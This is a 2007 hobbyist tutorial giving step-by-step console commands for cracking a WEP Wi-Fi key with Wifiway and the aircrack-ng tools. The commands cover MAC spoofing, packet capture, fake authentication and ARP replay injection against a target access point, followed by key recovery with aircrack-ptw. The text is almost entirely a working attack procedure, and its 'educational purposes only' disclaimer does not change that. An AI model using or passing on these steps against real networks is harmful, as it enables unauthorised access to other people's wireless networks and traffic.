Tutorial – hack WEP with Wifiway (3945abg)


Console  1:
echo CHANNEL > /sys/class/net/wifi0/device/channel
-   Replace CHANNEL with the channel the AP is sending on.
airodump-ng rtap0
press Ctrl+C to cancel
Console 2:
ifconfig wifi0 down
( macchanger -m FF:FF:FF:FF:FF:FF wifi0 )
echo BSSID > /sys/class/net/wifi0/device/bssid
-   the BSSID is the MAC of an AP.
echo 2 > /sys/class/net/wifi0/device/rate
-   the ‘2‘ sets the rate to 2mb/s (if you are close to the AP, set it to 12)
ifconfig wifi0 up
Console 1:
airodump-ng -c CHANNEL -w FILE rtap0

-   FILE: That is the file, where the captured packets are saved.

Console 2:
macchanger -s wifi0
aireplay-ng -1 10 -a BSSID -e ESSID -h EURE_MAC wifi0

-   BSSID = AP’s MAC
-   ESSID = Name of the AP
-   EURE_MAC = your MAC, see above

Console 3:
aireplay-ng -3 -b BSSID -e ESSID -h EURE_MAC wifi0

-   I think you know, what the abbreviations mean.

When you have 100.000 or more start aircrack-ptw (Sometimes 50.000 are also enough).

Console 4:

aircrack-ptw FILE-01.cap

-   If aircrack-ptw is successful, it will show you the hex key


What you need:

-   Wifiway 1.0 Beta2 ( www.wifiway.org ) - not final, there are some changes!
-   Intel® PRO/Wireless 3945ABG Network Connection
 


Meaning of the abbreviations:
 
 AP – Access Point
 BSSID: MAC-adresse of the Access Point
 ESSID: name of the Access Points
 MAC: MAC-adresse of the network adapter
 Channel: Channel, on which the Access Point is sending


 WARNING: These information are for educational purposes only!
                                         Use it at your own risk.

   Â©2007 by cosypanther